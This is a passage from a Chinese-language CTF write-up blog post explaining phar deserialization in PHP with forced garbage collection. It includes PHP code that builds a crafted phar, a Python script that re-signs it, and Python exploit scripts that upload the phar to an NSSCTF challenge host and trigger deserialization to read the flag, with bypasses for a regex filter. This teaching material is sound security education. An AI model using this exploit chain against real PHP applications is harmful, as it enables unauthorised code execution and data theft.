<span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'/get|flag|post|php|filter|base64|rot13|read|data/i'</span><span class="token punctuation">,</span> <span class="token variable">$data</span><span class="token punctuation">)</span>
不免想到这里会使用phar协议
phar反序列化利用条件：
<span class="token operator">&lt;</span><span class="token number">1</span><span class="token operator">></span>有文件操作函数<span class="token punctuation">(</span>file_put_contents等等<span class="token punctuation">)</span>
<span class="token operator">&lt;</span><span class="token number">2</span><span class="token operator">></span>服务端有phar文件<span class="token punctuation">(</span>和后缀名无关，主要是格式。这里我们利用<span class="token function">file_put_contents</span><span class="token punctuation">(</span><span class="token punctuation">)</span>函数来写入文件<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>大概思路就是先写入文件到&#x2F;tmp&#x2F;a.txt中，再利用<strong>phar协议</strong>解析&#x2F;tmp&#x2F;a.txt文件，触发<code>destruct()</code>获取环境变量中的flag。绕过<code>throw new Error()</code>的方法就是自己触发GC机制，提前进入<code>__destruct()</code>。</p>
<h3 id="phar"><a href="#phar" class="headerlink" title="phar"></a>phar</h3><p>要生成phar文件的话，必须在php.ini文件中将phar.readonly选项设置为Off，否则无法生成phar文件。(设置时注意把前面分号删掉)<br> <img src="https://img-blog.csdnimg.cn/c2c224439fdc4c3ea5931ff326460616.png" alt="请添加图片描述"></p>
<p>生成phar文件代码：</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token keyword">class</span> <span class="token class-name-definition class-name">getflag</span> <span class="token punctuation">&#123;</span>
<span class="token punctuation">&#125;</span>
 
<span class="token variable">$c</span><span class="token operator">=</span><span class="token keyword">new</span> <span class="token class-name">getflag</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$phar</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Phar</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"123.phar"</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">//后缀名必须为phar</span>
<span class="token variable">$phar</span><span class="token operator">-></span><span class="token function">startBuffering</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$phar</span><span class="token operator">-></span><span class="token function">setStub</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"xxx"</span><span class="token operator">.</span><span class="token string double-quoted-string">"xxx&lt;?php __HALT_COMPILER(); ?>"</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">//设置stub</span>
<span class="token variable">$phar</span><span class="token operator">-></span><span class="token function">setMetadata</span><span class="token punctuation">(</span><span class="token number">123</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">//将自定义的meta-data存入manifest</span>
<span class="token variable">$phar</span><span class="token operator">-></span><span class="token function">addFromString</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"test.txt"</span><span class="token punctuation">,</span> <span class="token string double-quoted-string">"test"</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">//添加要压缩的文件</span>
<span class="token comment">//签名自动计算</span>
<span class="token variable">$phar</span><span class="token operator">-></span><span class="token function">stopBuffering</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>phar文件有四部分组成：</p>
<blockquote>
<ol>
<li>a stub</li>
</ol>
<p>stub的基本结构：**<code>xxx&lt;?php xxx;__HALT_COMPILER();?&gt;</code>，**前面内容不限，但必须以<code>__HALT_COMPILER();?&gt;</code>来结尾，否则phar扩展将无法识别这个文件为phar文件。</p>
<p>​	2.a manifest describing the contents</p>
<p>Phar文件中被压缩的文件的一些信息，其中Meta-data部分的信息会以序列化的形式储存(可控)，当通过phar:&#x2F;&#x2F;协议对phar文件进行文件操作时，将会对phar文件中的Meta-data进行反序列化操作这里就是漏洞利用的关键点。</p>
<p>​	3. the file contents 文件内容</p>
<p>被压缩的文件内容，在没有特殊要求的情况下，这个被压缩的文件内容可以随便写的，因为我们利用这个漏洞主要是为了触发它的反序列化。</p>
<p>​	4.signature 签名</p>
<p>注意phar文件不能任意修改，修改之后由于签名的存在，文件就会失效。</p>
</blockquote>
<p>查看生成的phar文件：</p>
<p>phar的反序列化标签格式&#x3D;变长字节散列函数值+4字节所使用散列函数标签名+4字节固定标签GBMB</p>
<p><img src="https://img-blog.csdnimg.cn/21937b33f24b4b75951b683dd0bfadb9.png" alt="请添加图片描述"></p>
<p>根据02 00 00 00可知是sha1计算签名<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/phar.fileformat.signature.php">文件链接</a><br> <img src="https://img-blog.csdnimg.cn/745c261c5195453fa2060be5ee60029e.png" alt="请添加图片描述"></p>
<p>好了，现在根据题目生成一个phar文件</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token keyword">class</span> <span class="token class-name-definition class-name">getflag</span><span class="token punctuation">&#123;</span>

<span class="token punctuation">&#125;</span>

<span class="token variable">$a</span><span class="token operator">=</span><span class="token keyword">new</span> <span class="token class-name">getflag</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$phar</span><span class="token operator">=</span><span class="token keyword">new</span> <span class="token class-name">Phar</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"czy.phar"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>                                        <span class="token comment">//这里后缀必须为phar</span>
<span class="token variable">$phar</span><span class="token operator">-></span><span class="token function">startBuffering</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>                                             <span class="token comment">//开始写入内容</span>
<span class="token variable">$phar</span><span class="token operator">-></span><span class="token function">setStub</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"&lt;?php __HALT_COMPILER();?>"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>                        <span class="token comment">//phar标识</span>
<span class="token variable">$phar</span><span class="token operator">-></span><span class="token function">setmetadata</span><span class="token punctuation">(</span><span class="token keyword">array</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token operator">=></span><span class="token variable">$a</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token operator">=></span><span class="token constant">null</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//上面数组中第一位是$a,第二位是null。序列化内容，这里内部相当于调用了serialize函数</span>
<span class="token variable">$phar</span><span class="token operator">-></span><span class="token function">addFromString</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"czy.txt"</span><span class="token punctuation">,</span><span class="token string double-quoted-string">"czy"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>                           <span class="token comment">//添加要一起加入phar归档的文件（文件名+内容）</span>
<span class="token variable">$phar</span><span class="token operator">-></span><span class="token function">stopBuffering</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>                                              <span class="token comment">//停止写入，签名自动计算</span>
<span class="token keyword">echo</span> <span class="token string double-quoted-string">"成功生成phar文件"</span><span class="token punctuation">;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>在这里注意，我们把这个类先赋给数组，再令赋值数组为NULL，它就会失去引用从而触发GC，达到绕过GC的目的。</p>
<p>ok，程序运行后会生成一个czy.phar文件。我们看它的metadata部分</p>
<p><img src="https://img-blog.csdnimg.cn/2771c6ad047944e2b91e0608e09d73b9.png" alt="请添加图片描述"></p>
<p>注意这0是将对象实例化的内容，由于getflag里面为空，也就显示了<code>&#123;&#125;i</code>，而这里的1就是null，此时如果我们把1强行改为0，那么就验证了上面的说法<code>令赋值数组为null</code>从而触发GC机制。但是也要注意，再将<code>0:&#123;&#125;i:1;N;</code>改为<code>0:&#123;&#125;i:0;N;</code>后，该文件需要对签名进行修复，phar文件用16进制编辑器打开后后28位的后四位是固定标识GBMB，21-24位代表的是sha1签名标识，而1-20位在这里就需要修改了。</p>
<p>借鉴一下脚本：</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> hashlib <span class="token keyword">import</span> sha1 <span class="token comment">#sha1签名</span>
<span class="token keyword">with</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">"czy.phar"</span><span class="token punctuation">,</span><span class="token string">'rb'</span><span class="token punctuation">)</span> <span class="token keyword">as</span> f<span class="token punctuation">:</span>
   text<span class="token operator">=</span>f<span class="token punctuation">.</span>read<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
   main<span class="token operator">=</span>text<span class="token punctuation">[</span><span class="token punctuation">:</span><span class="token operator">-</span><span class="token number">28</span><span class="token punctuation">]</span>        <span class="token comment">#正文部分(除去最后28字节)</span>
   end<span class="token operator">=</span>text<span class="token punctuation">[</span><span class="token operator">-</span><span class="token number">8</span><span class="token punctuation">:</span><span class="token punctuation">]</span>
   new_sign<span class="token operator">=</span>sha1<span class="token punctuation">(</span>main<span class="token punctuation">)</span><span class="token punctuation">.</span>digest<span class="token punctuation">(</span><span class="token punctuation">)</span>
   new_phar<span class="token operator">=</span>main<span class="token operator">+</span>new_sign<span class="token operator">+</span>end
   <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">"czy.phar"</span><span class="token punctuation">,</span><span class="token string">'wb'</span><span class="token punctuation">)</span><span class="token punctuation">.</span>write<span class="token punctuation">(</span>new_phar<span class="token punctuation">)</span>     <span class="token comment">#将新生成的内容以二进制方式覆盖写入原来的phar文件</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>这里1-20位重新进行了sha1签名，修复好后，由于phar文件里还有getflag明文，如果要绕过正则的话，一个方法就是<strong>传数组</strong>来绕过正则，另一种办法就是将czy.phar再进行一次<strong>压缩</strong>，这样就不会出现getflag字样。</p>
<p>法一：</p>
<p>传数组</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> requests
<span class="token keyword">import</span> re

url<span class="token operator">=</span><span class="token string">"http://node4.anna.nssctf.cn:28513/"</span>

<span class="token comment">### 写入phar文件</span>
<span class="token keyword">with</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">"czy.phar"</span><span class="token punctuation">,</span><span class="token string">'rb'</span><span class="token punctuation">)</span> <span class="token keyword">as</span> f<span class="token punctuation">:</span>
    data1<span class="token operator">=</span><span class="token punctuation">&#123;</span><span class="token string">'0[]'</span><span class="token punctuation">:</span>f<span class="token punctuation">.</span>read<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#125;</span>                                    <span class="token comment">#注意这里要传数组，来绕过waf</span>
    param1 <span class="token operator">=</span> <span class="token punctuation">&#123;</span><span class="token number">0</span><span class="token punctuation">:</span> <span class="token string">'O:1:"A":1:&#123;s:6:"config";s:1:"w";&#125;'</span><span class="token punctuation">&#125;</span>
    p1 <span class="token operator">=</span> requests<span class="token punctuation">.</span>post<span class="token punctuation">(</span>url<span class="token operator">=</span>url<span class="token punctuation">,</span> params<span class="token operator">=</span>param1<span class="token punctuation">,</span>data<span class="token operator">=</span>data1<span class="token punctuation">)</span>
    <span class="token comment">#print(p1.text)</span>

<span class="token comment">### 读phar文件，触发反序列化</span>
param2<span class="token operator">=</span><span class="token punctuation">&#123;</span><span class="token number">0</span><span class="token punctuation">:</span><span class="token string">'O:1:"A":1:&#123;s:6:"config";s:1:"r";&#125;'</span><span class="token punctuation">&#125;</span>
data2<span class="token operator">=</span><span class="token punctuation">&#123;</span><span class="token number">0</span><span class="token punctuation">:</span><span class="token string">"phar://tmp/a.txt"</span><span class="token punctuation">&#125;</span>
p2<span class="token operator">=</span>requests<span class="token punctuation">.</span>post<span class="token punctuation">(</span>url<span class="token operator">=</span>url<span class="token punctuation">,</span>params<span class="token operator">=</span>param2<span class="token punctuation">,</span>data<span class="token operator">=</span>data2<span class="token punctuation">)</span>
p2<span class="token punctuation">.</span>encoding<span class="token operator">=</span><span class="token string">"utf-8"</span>
flag<span class="token operator">=</span>re<span class="token punctuation">.</span><span class="token builtin">compile</span><span class="token punctuation">(</span><span class="token string">'NSSCTF\&#123;.*?\&#125;'</span><span class="token punctuation">)</span><span class="token punctuation">.</span>findall<span class="token punctuation">(</span>p2<span class="token punctuation">.</span>text<span class="token punctuation">)</span>  <span class="token comment">#用正则匹配匹配post包的response.text里的‘NSSCTF&#123;xxxxxx&#125;’</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>flag<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>法二：</p>
<p>压缩czy.phar文件</p>
<p><img src="https://img-blog.csdnimg.cn/a43894200dcf4af8a31e75a1a9ad2ccf.png" alt="请添加图片描述"></p>
<p>之后</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> requests

url <span class="token operator">=</span> <span class="token string">'http://node4.anna.nssctf.cn:28513/'</span>
requests<span class="token punctuation">.</span>post<span class="token punctuation">(</span>
    url<span class="token punctuation">,</span>
    params<span class="token operator">=</span><span class="token punctuation">&#123;</span>
        <span class="token number">0</span><span class="token punctuation">:</span> <span class="token string">'O:1:"A":1:&#123;s:6:"config";s:1:"w";&#125;'</span>

    <span class="token punctuation">&#125;</span><span class="token punctuation">,</span>
    data<span class="token operator">=</span><span class="token punctuation">&#123;</span>
        <span class="token number">0</span><span class="token punctuation">:</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">'czy.phar.gz'</span><span class="token punctuation">,</span> <span class="token string">'rb'</span><span class="token punctuation">)</span><span class="token punctuation">.</span>read<span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">)</span>

res <span class="token operator">=</span> requests<span class="token punctuation">.</span>post<span class="token punctuation">(</span>
    url<span class="token punctuation">,</span>
    params<span class="token operator">=</span><span class="token punctuation">&#123;</span>
        <span class="token number">0</span><span class="token punctuation">:</span> <span class="token string">'O:1:"A":1:&#123;s:6:"config";s:1:"r";&#125;'</span>
    <span class="token punctuation">&#125;</span><span class="token punctuation">,</span>
    data<span class="token operator">=</span><span class="token punctuation">&#123;</span>
        <span class="token number">0</span><span class="token punctuation">:</span> <span class="token string">'phar://tmp/a.txt'</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">)</span>
res<span class="token punctuation">.</span>encoding <span class="token operator">=</span> <span class="token string">'utf-8'</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>res<span class="token punctuation">.</span>text<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="https://img-blog.csdnimg.cn/95dfa9dfc043429a91753966aae7dffa.png" alt="2"></p>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p><a target="_blank" rel="noopener" href="http://arsenetang.com/2021/11/28/%E6%B5%85%E6%9E%90GC%E5%9B%9E%E6%94%B6%E6%9C%BA%E5%88%B6%E4%B8%8Ephar%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/#GC%E5%9C%A8phar%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%AD%E5%AE%9E%E9%99%85%E8%BF%90%E7%94%A8">参考链接1</a></p>
<p><a target="_blank" rel="noopener" href="http://xilzy666.gitee.io/xilzy/2022/03/05/nss-prize1-2/">参考链接2</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_51295677/article/details/123520193?ydreferer=aHR0cHM6Ly93d3cuYmluZy5jb20v">参考链接3</a></p>
<p><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/features.gc.php">参考链接4</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_53460654/article/details/121889104?ydreferer=aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzNDYwNjU0L2FydGljbGUvZGV0YWlscy8xMjE4ODkxMDQ=">参考链接5</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_53090346/article/details/127598455?ydreferer=aHR0cHM6Ly93d3cuYmluZy5jb20v">参考链接6</a></p>
 
      <!-- reward -->
      
      <div id="reword-out">
        <div id="reward-btn">
          打赏
        </div>
      </div>
      
    </div>
    

    <!-- copyright -->
    
    <div class="declare">
      <ul class="post-copyright">
        <li>
          <i class="ri-copyright-line"></i>
          <strong>版权声明： </strong>
          
          本博客所有文章除特别声明外，著作权归作者所有。转载请注明出处！
          
        </li>
      </ul>
    </div>
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=http://3143047748.github.io/2023/07/17/php%E7%9A%84%E5%9E%83%E5%9C%BE%E5%9B%9E%E6%94%B6-GC-%E6%9C%BA%E5%88%B6%E4%BB%8B%E7%BB%8D%E4%BB%A5%E5%8F%8A%E5%9C%A8phar%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%AD%E7%9A%84%E4%B8%80%E4%BA%9B%E5%88%A9%E7%94%A8/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li></ul>

    </footer>
  </div>

   
  <nav class="article-nav">
    
      <a href="/2023/07/20/%E6%B6%89%E5%8F%8ASSRF%E7%9A%84%E4%B8%80%E4%BA%9Btricks/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            涉及SSRF的一些tricks
          
        </div>
      </a>
    
    
      <a href="/2023/07/09/DC-2%E6%89%93%E9%9D%B6%E7%AC%94%E8%AE%B0/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">DC-2打靶笔记</div>
      </a>
    
  </nav>

   
<!-- valine评论 -->
<div id="vcomments-box">
  <div id="vcomments"></div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="https://cdn.staticfile.org/valine/1.4.16/Valine.min.js"></script>
<script>
  new Valine({
    el: "#vcomments",
    app_id: "5s6sYhVyYIhL1fb7zrErH8BX-gzGzoHsz",
    app_key: "829xTABHQSNKYRHRILDlEluh",
    path: window.location.pathname,
    avatar: "monsterid",
    placeholder: "给我的文章加点评论吧~",
    recordIP: true,
  });
  const infoEle = document.querySelector("#vcomments .info");
  if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
    infoEle.childNodes.forEach(function (item) {
      item.parentNode.removeChild(item);
    });
  }
</script>
<style>
  #vcomments-box {
    padding: 5px 30px;
  }

  @media screen and (max-width: 800px) {
    #vcomments-box {
      padding: 5px 0px;
    }
  }

  #vcomments-box #vcomments {
    background-color: #fff;
  }

  .v .vlist .vcard .vh {
    padding-right: 20px;
  }

  .v .vlist .vcard {
    padding-left: 10px;
  }
</style>

 
   
  
   
    <script src="https://cdn.staticfile.org/twikoo/1.4.18/twikoo.all.min.js"></script>
    <div id="twikoo" class="twikoo"></div>
    <script>
        twikoo.init({
            envId: ""
        })
    </script>
 
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2022-2023
        <i class="ri-heart-fill heart_icon"></i> n0rt6
      </li>
    </ul>
    <ul>
      <li>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>访问人数:<span id="busuanzi_value_site_uv"></span></span>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>浏览次数:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
        <li>
          <a href="https://beian.miit.gov.cn/" target="_black" rel="nofollow">豫ICP备88888888</a>
        </li>
        
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s9.cnzz.com/z_stat.php?id=1278069914&amp;web_id=1278069914'></script>
        
      </li>
    </ul>
  </div>
</footer>    
    </main>
    <div class="float_btns">
      <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

    </div>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/ayer-side.png" alt="n0rt6&#39;s bolg"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">Index</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">Archives</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">Categories</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">Tags</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/friends">Friends</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">About Me</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="搜索">
        <i class="ri-search-line"></i>
      </a>
      
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="/images/alipay.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="/images/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-3.6.0.min.js"></script>
 
<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->
 
<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: ".tocbot",
    contentSelector: ".article-entry",
    headingSelector: "h1, h2, h3, h4, h5, h6",
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: "main",
    positionFixedSelector: ".tocbot",
    positionFixedClass: "is-position-fixed",
    fixedSidebarOffset: "auto",
  });
</script>

<script src="https://cdn.staticfile.org/jquery-modal/0.9.2/jquery.modal.min.js"></script>
<link
  rel="stylesheet"
  href="https://cdn.staticfile.org/jquery-modal/0.9.2/jquery.modal.min.css"
/>
<script src="https://cdn.staticfile.org/justifiedGallery/3.8.1/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->
 <!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/photoswipe/4.1.3/default-skin/default-skin.min.css">
<script src="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe.min.js"></script>
<script src="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script> 
<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->
 
<script src="/js/busuanzi-2.3.pure.min.js"></script>
 
<!-- ClickLove -->

<!-- ClickBoom1 -->

<!-- ClickBoom2 -->

<!-- CodeCopy -->
 
<link rel="stylesheet" href="/css/clipboard.css">
 <script src="https://cdn.staticfile.org/clipboard.js/2.0.10/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>
 
<!-- CanvasBackground -->
 
<script src="/js/dz.js"></script>
 
<script>
  if (window.mermaid) {
    mermaid.initialize({ theme: "forest" });
  }
